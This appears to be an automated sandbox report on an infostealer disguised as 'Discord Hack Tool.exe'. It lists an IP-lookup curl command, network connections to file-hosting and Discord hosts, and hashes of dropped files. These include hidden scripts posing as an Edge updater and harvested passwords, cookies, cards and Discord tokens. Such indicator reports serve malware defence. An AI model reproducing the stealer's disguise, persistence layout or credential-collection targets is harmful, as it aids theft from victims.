C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"

C:\Windows\system32\curl.exe

curl http://api.ipify.org/ --ssl-no-revoke

Network

Country  Destination            Domain                              Proto
US       8.8.8.8:53             mega.nz                             udp
LU       31.216.145.5:443       mega.nz                             tcp
LU       31.216.145.5:443       mega.nz                             tcp
NL       66.203.127.11:443      eu.static.mega.co.nz                tcp
NL       66.203.127.11:443      eu.static.mega.co.nz                tcp
US       8.8.8.8:53             172.214.232.199.in-addr.arpa        udp
US       8.8.8.8:53             95.221.229.192.in-addr.arpa         udp
LU       66.203.125.15:443      g.api.mega.co.nz                    tcp
LU       66.203.125.15:443      g.api.mega.co.nz                    tcp
NL       66.203.127.11:443      eu.static.mega.co.nz                tcp
N/A      127.0.0.1:6341                                             tcp
N/A      127.0.0.1:6341                                             tcp
N/A      224.0.0.251:5353                                           udp
US       8.8.8.8:53             gfs214n108.userstorage.mega.co.nz   udp
US       8.8.8.8:53             gfs204n118.userstorage.mega.co.nz   udp
CA       162.208.16.18:443      gfs302n108.userstorage.mega.co.nz   tcp
CA       162.208.16.18:443      gfs302n108.userstorage.mega.co.nz   tcp
CA       162.208.16.18:443      gfs302n108.userstorage.mega.co.nz   tcp
CA       162.208.16.18:443      gfs302n108.userstorage.mega.co.nz   tcp
FR       185.206.26.18:443      gfs208n108.userstorage.mega.co.nz   tcp
FR       185.206.26.18:443      gfs208n108.userstorage.mega.co.nz   tcp
FR       185.206.26.18:443      gfs208n108.userstorage.mega.co.nz   tcp
FR       185.206.26.18:443      gfs208n108.userstorage.mega.co.nz   tcp
LU       89.44.168.102:443      gfs270n386.userstorage.mega.co.nz   tcp
LU       89.44.168.102:443      gfs270n386.userstorage.mega.co.nz   tcp
LU       89.44.168.102:443      gfs270n386.userstorage.mega.co.nz   tcp
LU       89.44.168.102:443      gfs270n386.userstorage.mega.co.nz   tcp
NL       185.206.24.26:443      gfs204n118.userstorage.mega.co.nz   tcp
NL       185.206.24.26:443      gfs204n118.userstorage.mega.co.nz   tcp
NL       185.206.24.26:443      gfs204n118.userstorage.mega.co.nz   tcp
NL       185.206.24.26:443      gfs204n118.userstorage.mega.co.nz   tcp
DE       94.24.36.10:443        gfs262n300.userstorage.mega.co.nz   tcp
DE       94.24.36.10:443        gfs262n300.userstorage.mega.co.nz   tcp
DE       94.24.36.10:443        gfs262n300.userstorage.mega.co.nz   tcp
DE       94.24.36.10:443        gfs262n300.userstorage.mega.co.nz   tcp
ES       185.206.27.18:443      gfs214n108.userstorage.mega.co.nz   tcp
ES       185.206.27.18:443      gfs214n108.userstorage.mega.co.nz   tcp
ES       185.206.27.18:443      gfs214n108.userstorage.mega.co.nz   tcp
ES       185.206.27.18:443      gfs214n108.userstorage.mega.co.nz   tcp
GB       104.86.110.114:443                                         tcp
GB       92.123.128.147:443     r.bing.com                          tcp
GB       92.123.128.147:443     r.bing.com                          tcp
GB       92.123.128.147:443     r.bing.com                          tcp
GB       92.123.128.147:443     r.bing.com                          tcp
GB       92.123.128.147:443     r.bing.com                          tcp
GB       92.123.128.147:443     r.bing.com                          tcp
GB       92.123.128.177:443     www.bing.com                        tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50165                                            tcp
US       162.159.128.233:443    discord.com                         tcp
US       104.26.13.205:80       api.ipify.org                       tcp
US       104.26.13.205:80       api.ipify.org                       tcp
US       104.26.13.205:80       api.ipify.org                       tcp
DE       49.13.193.134:443      api.filedoge.com                    tcp
US       104.26.13.205:80       api.ipify.org                       tcp
GB       2.23.210.75:80         r11.o.lencr.org                     tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50299                                            tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50322                                            tcp
N/A      127.0.0.1:50338                                            tcp
US       104.26.13.205:80       api.ipify.org                       tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50358                                            tcp
US       104.26.13.205:80       api.ipify.org                       tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50409                                            tcp
N/A      127.0.0.1:50435                                            tcp
US       104.26.13.205:80       api.ipify.org                       tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50466                                            tcp
N/A      127.0.0.1:50486                                            tcp
US       104.26.13.205:80       api.ipify.org                       tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50506                                            tcp
US       104.26.13.205:80       api.ipify.org                       tcp
US       104.26.13.205:80       api.ipify.org                       tcp
N/A      127.0.0.1:50526                                            tcp
N/A      127.0.0.1:50546                                            tcp
N/A      127.0.0.1:50566                                            tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 c03d23a8155753f5a936bd7195e475bc
SHA1 cdf47f410a3ec000e84be83a3216b54331679d63
SHA256 6f5f7996d9b0e131dc2fec84859b7a8597c11a67dd41bdb5a5ef21a46e1ae0ca
SHA512 6ea9a631b454d7e795ec6161e08dbe388699012dbbc9c8cfdf73175a0ecd51204d45cf28a6f1706c8d5f1780666d95e46e4bc27752da9a9d289304f1d97c2f41

\??\pipe\LOCAL\crashpad_5728_MPZHZISPTKOBXOGA

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3d68c7edc2a288ee58e6629398bb9f7c
SHA1 6c1909dea9321c55cae38b8f16bd9d67822e2e51
SHA256 dfd733ed3cf4fb59f2041f82fdf676973783ffa75b9acca095609c7d4f73587b
SHA512 0eda66a07ec4cdb46b0f27d6c8cc157415d803af610b7430adac19547e121f380b9c6a2840f90fe49eaea9b48fa16079d93833c2bcf4b85e3c401d90d464ad2f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 10dc4966174406dddc5b7c9ab126e3d0
SHA1 dc56fcf80f1210d8c16a627d44b898b46cb0276d
SHA256 9d2eaf920bf43ae76a60b592fe1c43ce2a7227da81d7abacd5b911411697ff3c
SHA512 475aecd04693a7b092a249927a0d3af8546b3899178840ee7d0c274ffeef2a0a606b08961e9a54cc72415bc64baa459cb61449bd9cdd562480870c79fbbda13d

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 6752a1d65b201c13b62ea44016eb221f
SHA1 58ecf154d01a62233ed7fb494ace3c3d4ffce08b
SHA256 0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd
SHA512 9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 dbd1aad6d652564c7830c6626f1b6080
SHA1 8c9ccf14c3bfbd44d0b909be402335b4dbb352cd
SHA256 33a9ff3877f023b0e5da451618d626411d2074459664723a8300d3cb652cf8a9
SHA512 741a0078ea13278ef824ff0cf3dbc29710b62d62e03f24c2fb56d012e70841dbc160adea67b59c42a8b166b328382a02f4762218d3caf8828f9894ff05e9a025

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 edf652416963e9d3d453d6ae71bd5392
SHA1 1c7ec3b2337702982aa4b78c1540375b30872f87
SHA256 e219782a26857d10dd1bf8dab839bf450b9710d3c595c34b62e1e1d2ad3e2e30
SHA512 53263046ff591f060ffbaf49171ed80e603b31ec51e27c46712587e662e97dd74413b7910e17b98bbb4ad94f5823f84c5ef71964a1a90bd00f47f21767d7c422

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 9557077999376925a9bb6588f8fd6a36
SHA1 ecac4387731e9cdb4abe3a4fc9f4239e2669f479
SHA256 69a4ac05e9a73d7b8dd6b96940ae4b15fb3b29a22b0ee1076be3c8e36f204213
SHA512 8a01cffc86e10d7e788943c517738db86dca67bba4ead7bf67d54ecc3e75bf3627be292e667a5681904ba44313ef6c21b5784cf93abd9b15077f71376b0f87e4

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

MD5 6b6e0bf89c9e3ca1d5c3f4619fed5d2c
SHA1 7754f5273776df71f3a0703242c4508c5c8ca644
SHA256 3bb77cd2e8773a06cad6f954efa3da136ee8372dc83ca803ca91b120821a480e
SHA512 590e26c198884bd69e755349e84c7f2dd203b5c81564b417f7c3a1bc99cc0c6a8f3501be00985e34070e40cadaa0ce565a06e5ddaef354c1a266e5a65ea55f51

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580470.TMP

MD5 93f0328d107d88d63120c842f21c1510
SHA1 920eee8930456daa717510b018197447ce241894
SHA256 b7b9533b58869da8a9d5dd9df133aa3273d3545336359cd6adc98844104b4262
SHA512 b50a174f702541eb2671d4f1fd99832fc047a66617d1b6d139f6541136de047f985a12d0133208bb1350f9a1d90333bd2754b5066bb8d238b3d697ae15398399

C:\Users\Admin\Downloads\Discord Hack Tool.exe

MD5 7a89d2544714e445682d828b0f729b5f
SHA1 4c55c66ca16b17959a872d7179f0476f1622c9ec
SHA256 636f647539bf6dc083ae7a41b5e9cb19337046e2297c289760a104452d5a7255
SHA512 ce5d655254a7b605024cb3d3fa9a3ad2459174f4fe11d92637ccc3633ba7aeb3a471cb15d6d21dcda7c3fad5bc263c064fcbd9514c26fbd9a0d8c517036758d0

C:\Users\Admin\Downloads\Discord Hack Tool.exe:Zone.Identifier

MD5 fbccf14d504b7b2dbcb5a5bda75bd93b
SHA1 d59fc84cdd5217c6cf74785703655f78da6b582b
SHA256 eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913
SHA512 aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 c09ea00fed4bf0520c59cdba5e654e69
SHA1 ae8420c460678f8b8472207d21fb5cc961257ca7
SHA256 b16c51ad6922572aa76285a7eb85f9e87cc630a1edee0bd212d1df03e5a59f8e
SHA512 77067c62ce93bc4043f69543ba408094c8580236fe57d7b696fea139b6e490f4c81c5def873d507abed132983cbf6df9d47d732a872b3f3c2359052ff8c3de48

C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\777e9ec9-7c93-4570-a59a-3af16089ec03.down_data

MD5 5683c0028832cae4ef93ca39c8ac5029
SHA1 248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256 855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512 aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3

C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

MD5 66a65322c9d362a23cf3d3f7735d5430
SHA1 ed59f3e4b0b16b759b866ef7293d26a1512b952e
SHA256 f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c
SHA512 0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

C:\Users\Admin\Downloads\temp.ps1

MD5 18047e197c6820559730d01035b2955a
SHA1 277179be54bba04c0863aebd496f53b129d47464
SHA256 348342fd00e113a58641b2c35dd6a8f2c1fb2f1b16d8dff9f77b05f29e229ef3
SHA512 1942acd6353310623561efb33d644ba45ab62c1ddfabb1a1b3b1dd93f7d03df0884e2f2fc927676dc3cd3b563d159e3043d2eff81708c556431be9baf4ccb877

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1jesll45.luv.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5488-307-0x0000025B74290000-0x0000025B742B2000-memory.dmp

memory/5488-308-0x0000025B74330000-0x0000025B74376000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.cmdline

MD5 38ed05083dcdf855ba993fc676307315
SHA1 94994ce1619ba3a42d435fd2fb68e20551acdb74
SHA256 381fad8c2f64c9cb68b761f0210140a0d0c5ed19242bd3a7d412d46546240925
SHA512 87bd817186f14db7d851de2e262c8d1f8f5734a205a53dae1cafd3b5c3595c5a9a5b616c4a9289defacabd194354c7e5bcdf1a0c97a678d252300c7ff0ee6718

\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.0.cs

MD5 7bc8de6ac8041186ed68c07205656943
SHA1 673f31957ab1b6ad3dc769e86aedc7ed4b4e0a75
SHA256 36865e3bca9857e07b1137ada07318b9caaef9608256a6a6a7fd426ee03e1697
SHA512 0495839c79597e81d447672f8e85b03d0401f81c7b2011a830874c33812c54dab25b0f89a202bbb71abb4ffc7cb2c07cc37c008b132d4d5d796aebdd12741dba

\??\c:\Users\Admin\AppData\Local\Temp\lkpv3aqj\CSCFE21C5C5317A4A3B81B3616149D2A28F.TMP

MD5 1256b9757e08db9a24ff8b1c3bde0bd9
SHA1 a26f125c0b7d7e94579a5a3ffa05e6febbcdd436
SHA256 e24a132e835a7972aab67fee93dd77197de84ca59dd35d43598f26f25b8f49da
SHA512 df18bebb3a6bf88bf0f57a7ac419512505c04d7792937ff899cb979815248d4db7f459ba291ef63426a0cca17f5568a5ea688c5019259d55be85c6d0ecd6572b

C:\Users\Admin\AppData\Local\Temp\RES5743.tmp

MD5 24bf20c7da8cda980e104cecea6e811a
SHA1 895b1ca9530597ec5671231aa2c69411b1e1d215
SHA256 46d6cc7946062bc84acc79c7a6473afe6d4c6a0eb1db34c68f37ed873540013e
SHA512 e267f8d782358d776ab4dad6c31d6fcdc7b39681443b3bb6da63977e6a8b2936fb441c4e4113eb2f34037bb779e17bb39593cf24a48cfb9a8ae02f0bb6cdbd95

C:\Users\Admin\AppData\Local\Temp\lkpv3aqj\lkpv3aqj.dll

MD5 dc68c71403fb35455f2ec8757d03d299
SHA1 3a14f8d4a0cefe2d3bfa9073ba7822dac2053c9d
SHA256 411bf004570ba42d74e01fc3d10aa79f095f5cdc6934b2f63082f56e0c70c679
SHA512 2e520e5cb7584eff73c4e648dfb744f7dec3b31b40054c7470d4f310bb37553ba45fe33f954cfda0f16b4c6143e575477d44d25a005b8e18b8c14f0f2bdac680

memory/5488-321-0x0000025B74300000-0x0000025B74308000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 5f4c933102a824f41e258078e34165a7
SHA1 d2f9e997b2465d3ae7d91dad8d99b77a2332b6ee
SHA256 d69b7d84970cb04cd069299fd8aa9cef8394999588bead979104dc3cb743b4f2
SHA512 a7556b2be1a69dbc1f7ff4c1c25581a28cb885c7e1116632c535fee5facaa99067bcead8f02499980f1d999810157d0fc2f9e45c200dee7d379907ef98a6f034

memory/1004-336-0x000001C576CD0000-0x000001C576D20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6cc0a34d75380a039c8a2d2821e13e86
SHA1 3880cdef9421ad3ec32c463585fe3898ce9d5ade
SHA256 8942db45f7c5cf6be3abc9fe503a8bc485a720bb7a5838e6aebeb80f25f691d0
SHA512 eb91b7fb2b9c68078715b1512a2105f3d92123cef1cf2bb6e9fff63c714363c521b4cb840354f2d9f3792a088b9cc623b69514f48096e919a552837a21b47fb1

C:\Users\Admin\AppData\Local\Temp\a92ba44b56b77ce4f21f36ab78a2afeaEtZwIu\DisconnectBackup.docx

MD5 9c3beaa0d2614d9e6cc74cd8aa3fc742
SHA1 90f499d74fd2112409ef441bbd2da4950971d31e
SHA256 e87b22799b18f247b0a89b49a120f4b22ee522458079c3cd0a898121acb14760
SHA512 73a31e91034f46633aa9324bad7434962f88c890345f69a3032fa90327c35dbb706193e9d5e78f894ec7d08f2c798628ed2116f768b2949de1e53472d988d049

C:\Users\Admin\AppData\Local\Temp\a92ba44b56b77ce4f21f36ab78a2afeaEtZwIu\MeasureBackup.pdf

MD5 f2b1aed721fe827e3486af4471ed7d0a
SHA1 216876197d4da080eff1f842871f36235ea31c59
SHA256 fa096644e58f08983dc2a0f52852cbebcda052d74a7d2595c4531b0a4c86ffb3
SHA512 52c426960baf3f7373f1c1a395476f13384ac577f24ec8e82bbf224342c54db3824a523e847d7e58eebbc34a0576499701b892e89c791b6029a02f55ea9f98cf

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log

MD5 242305cfa742970f2f3c4708b0eaac45
SHA1 33999ee6f04281ffb8cc33f7dc9fef0a4ae54c0a
SHA256 f3f7ba96694df6b5309dadda3d9c8682d134fa2ec5713339f69602ee8dc6e59d
SHA512 5b58d8c3b95c61347dc23c144b648241e5896a88e31da04bf20f367f95ee81026eeb62e00cbefc75e46909b1d66273631537c93f8a6e9a3ef7c8d55955a0028f

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 321d57fccee188820bd2d061279ef76b
SHA1 8c5c83ffe3579529e091b79333adf3e67b18077e
SHA256 d2a97bdb5fddb22462e56382db24e2e01aff52cde524d55b7b7617a53c607709
SHA512 fd5b49c272dc22d5e2332ee6b0d5d88877ac96af3803a77e4b327d8884869fc68e1ed0a978660d149b85b19c5c09b39caba100db5087c4a50ce3820c7a66ffa5

C:\ProgramData\edge\Updater\Get-Clipboard.ps1

MD5 a8834c224450d76421d8e4a34b08691f
SHA1 73ed4011bc60ba616b7b81ff9c9cad82fb517c68
SHA256 817c184e6a3e7d1ff60b33ec777e23e8e0697e84efde8e422833f05584e00ea5
SHA512 672b3eca54dff4316db904d16c2333247e816e0cd8ef2d866111ddb49ab491568cc12d7263891707403dd14962326404c13855d5de1ae148114a51cb7d5e5596

C:\ProgramData\edge\Updater\RunBatHidden.vbs

MD5 14a9867ec0265ebf974e440fcd67d837
SHA1 ae0e43c2daf4c913f5db17f4d9197f34ab52e254
SHA256 cca09191a1a96d288a4873f79a0916d9984bd6be8dcbd0c25d60436d46a15ca1
SHA512 36c69c26fd84b9637b370a5fe214a90778c9ade3b11664e961fe14226e0300f29c2f43d3a1d1c655d9f2951918769259928bbbc5a9d83596a1afc42420fc1a54

C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat

MD5 3dc18365d12c9d00b5e2ab37b05f4bf1
SHA1 4b43f9f249bb7c00ca94f1d2d593882808d9f09d
SHA256 2469ae66e24a8d4b8196c511927400745cb05daf63eaf315390c6e7027ab9bc9
SHA512 08e39debe9eed49343e5ef855197e0c3b62783a5ae27ab96343ae4b109af809fab356cb42051e1a9f4b1b205bb92ec0f03b9c77e7a765773ed4464cc263fe01e

\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.cmdline

MD5 0e7c4010cfe49d314f8c16f50a9a5209
SHA1 902709ff43d3ee8320f8981b232867cc5722400c
SHA256 2e5d4e70ee8df06be8bdb2c2e98bdd1c2aeed3d61f35ac6b75ec0225452d4599
SHA512 5a07d6ed360f8a8fedefc6ab0e6ba3c8af3122c42acd6409dd24ea609b7d9244b2b34615eaaa10e98ce53d6106644edc7bbe73c1f6ad8797894b166ab582a5dc

\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.0.cs

MD5 b462a7b0998b386a2047c941506f7c1b
SHA1 61e8aa007164305a51fa2f1cebaf3f8e60a6a59f
SHA256 a81f86cd4d33ebbf2b725df6702b8f6b3c31627bf52eb1cadc1e40b1c0c2bb35
SHA512 eb41b838cc5726f4d1601d3c68d455203d3c23f17469b3c8cbdd552f479f14829856d699f310dec05fe7504a2ae511d0b7ffff6b66ceadb5a225efe3e2f3a020

\??\c:\Users\Admin\AppData\Local\Temp\alkib1u5\CSC7E947611C34014BACF222DB2E44B9.TMP

MD5 92a4dc443a97ad574316e0a549a0cf5f
SHA1 ba852dff28a91bdc44db4a428988c6811c18928f
SHA256 cb78bb0231033a90db4ce0211e7286ff88f1ae33e00d513ae867ff9a2d774621
SHA512 3568587690b62f9c28d2308dfae93afdeead67fec686204be7a565e76c1effd8152a01c5933238a0b2d7bd7f3324a924507d42eeeb4d5ccb329c1012df726e74

C:\Users\Admin\AppData\Local\Temp\RES5EE4.tmp

MD5 1100d83892f4910633efc703fbc81bfe
SHA1 21211280d3d4bf8010ccad600d837be03e48a014
SHA256 539556057c52dd182667f3eea7ac6f3a231d1a1dba1e1d10c231133d10a651ab
SHA512 e144ad975a43bb78af033cf8de8afbf2c4a346eab5db083c9cf2a52fc564b375bddc5759a1f700c5379149c79ba94237f66b87d6ae2766820c16d7e0cd8bf5f6

C:\Users\Admin\AppData\Local\Temp\alkib1u5\alkib1u5.dll

MD5 b833658801fbad7f04e700d2545bf541
SHA1 e6a51620d1eb0242f256ff0a3096cda045f5b232
SHA256 4bfd6bf062139a5ce455aee439fca2a7fca7779379445552e59b87a4d330dd05
SHA512 e3131cc17c57f9e653bba92a0e9beccfb9719858fd0ed1c6709014b0b3eafa397c7d561e58e1d7d9df7f2e217ad4b36629c6f0e1f7c8c69cd29fc01bf46a8696

memory/676-424-0x00000263AC350000-0x00000263AC358000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 39669e209b0ec52df5c516d4112178e9
SHA1 006ef55f6f5912a60a823776fb2d3476f5df4986
SHA256 b3b27bee0c324a6a84ecef0fe783eb73f9091528c6abffa6f3f836b4464856b1
SHA512 2809f7f640088cdce83c1c54dfad4eae9e635b9c3feb8467bd7e5ee20da3b0d02d9f90c0c79f1d2a6e7752e582a2e0c46bc2646ab87d547e8ccbc420341a8920

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 4093e5ab3812960039eba1a814c2ffb0
SHA1 b5e4a98a80be72fccd3cc910e93113d2febef298
SHA256 c0794e2b7036ce5612446a8b15e0c8387773bbc921f63cf8849f8a1f4ef3878c
SHA512 f3555b45aa1a1dd5214716dc81a05905c4ecd5a3e1276d35e08c65623ab1d14d469b3b576a5d9638264c1222d73889d2cc1ee43fb579d9ca3fcddd9f557cac7b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d5ed044e4f1e21179db39ad1fb6ca742
SHA1 3676af58ce6e48caa088d36a7837924f82a71d6e
SHA256 e89e1b210c5f2851508e7dba182fc4be83655b67197200f413fdbe21be0ab951
SHA512 97f9c523b46ec6dd02c20dd99c9313976f3b000231ceca724acf96be0f9075da0b72c91d415ee7e54118dca03c7bf0b97d986299656baa037a519ab7ad06df07

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Cards\Cards.txt

MD5 8a0ed121ee275936bf62b33f840db290
SHA1 898770c85b05670ab1450a96ea6fbd46e6310ef6
SHA256 983f823e85d9e4e6849a1ed58e5e3464f3a4adbe9d0daeeadd1416cf35178709
SHA512 7d429ce5c04a2e049cdf3f8d8165a989ab7e3e0ac25a7809c12c4168076492b797d2eebaf271ae02c51cb69786c2574ec3125166444e4fa6fc73430f75f8f154

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Autofills\Autofills.txt

MD5 2f308e49fe62fbc51aa7a9b987a630fe
SHA1 1b9277da78babd9c5e248b66ba6ab16c77b97d0b
SHA256 d46a44dd86cea9187e6049fd56bb3b450c913756256b76b5253be9c3b043c521
SHA512 c3065baa302032012081480005f6871be27f26da758dc3b6e829ea8a3458e5c0a4740e408678f3ecf4600279d3fcad796f62f35b8591e46200ce896899573024

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Cookies\Google_Default.txt

MD5 31f1018f819e256b1f5f0ba7f79b01aa
SHA1 50a1347671e5d4d0a8e0b0b178b7b3f9fec82fc7
SHA256 fddf657f6d965c785b36ab884411b6962b1666d81f4498ee4e669200527f4e9b
SHA512 59b3851872e5a1927981b06df676ddeca96b790aed7fc91df4a96e31124efd39c714141fe171406a682fcdaf98f427fc6fdc5e6e61a2844359e4c9246d9e2666

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\stolen_files.zip

MD5 86d0930e16b26906bf16e067615cbf4b
SHA1 0a31e8db6f2f8890d02ef24407abd8d1f28bdae6
SHA256 411a3bb92266ca00919c0e0346ac1e560723cee3fab2a78b0b9bf532bb0b1752
SHA512 cfc0bf6a1036d9a2770a418e8d81ae4ea13b6f4efdf8c9d86b79f5e91dec5b8d60dc6fc32edfef9fdfd8d121d5216362302733d013af919f8e1b6281c1901ff0

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Serial-Check.txt

MD5 b9874175566620121d427b868e7e8b53
SHA1 5b2086713a50b8de472a5f5d4dd8da6e7fe00291
SHA256 e3017d6c964d9f70232b99c31335286159a82f2d270ffe45f46c72ca457c633b
SHA512 56028c278c867794390f6ae2c8361f376c6b3bd4a206d3e12ca61cdbb90781e9b4d7d63986a537f62ce7ee8bffe8fe53edd2aec7e7b44770e43b0202a9c99435

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Passwords\Passwords.txt

MD5 c5e74f3120dbbd446a527e785dfe6d66
SHA1 11997c2a53d19fd20916e49411c7a61bfb590e9c
SHA256 e0fd13d912d320faaa64e177b4e75f54ec140692ebc5904d10e1cbe3e811ee05
SHA512 a2bab776d22abf857c7df84b3c90851829eda615fbd450c9c72ab89f97591224380990a86c8e7e40ac811aa1225592743eebed63125d519d138fa28b859f2a3f

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\Discord\discord.txt

MD5 675951f6d9d75fd2c9c06b5ff547c6fd
SHA1 9b474ab39d1e2aad52ea5272dbac7d4f9fe44c09
SHA256 60fe7843b40ed5b7c68118bbba6bfe5f786a76397cdedb80612fd7cefce7f244
SHA512 44dfb6c937283870c6eedf724649004a82631cd8eeb3f9c83e5bca619d1c9ffb8aa5f51c91d57f76789e2747712ce9c6ad207773928e5e00e712f640f8c25aea

C:\ProgramData\Steam\Launcher\EN-Aoyvszio\debug.log

MD5 425a0aa96a983ab490c8196389547158
SHA1 ad3879364ea013676b9b0f44db62c627fe5ad34c
SHA256 29350a26de3566a3f4419b6dd514df85517a866548088ad40802f865abac5944
SHA512 6d501174e4ef722c76fe8807487e0b6c7891fc2b2495297a43707f9e65c189a70e8f0153acf493a999616b208a73192d6bd7c73b1eee4f6f9f9191bc592b04ba

C:\ProgramData\Steam\Launcher\EN-Aoyvszio.zip

MD5 ab5f50cf9d53729e59567270f44c973a
SHA1 1fcbbb085eebb323ff5f18a6e936c12079b4fe78
SHA256 2e04667013ac5f9c6b463623e3fed0ad342930fbd9ed950b32ca4dfec3c74c50
SHA512 81e020463e25c0392bb920d6a9677d29478985724533d7588c23429e0e9266ae22d33080f253b5911e21b8e83f0a4ba833c712ea1bbf7827b095eb938623053c

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 446dd1cf97eaba21cf14d03aebc79f27
SHA1 36e4cc7367e0c7b40f4a8ace272941ea46373799
SHA256 a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf
SHA512 a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1

MD5 3a4319f4c31d7a7124b5ce79395a6f24
SHA1 face51cf7e0a0b8220084251bf686ee4c68058b7
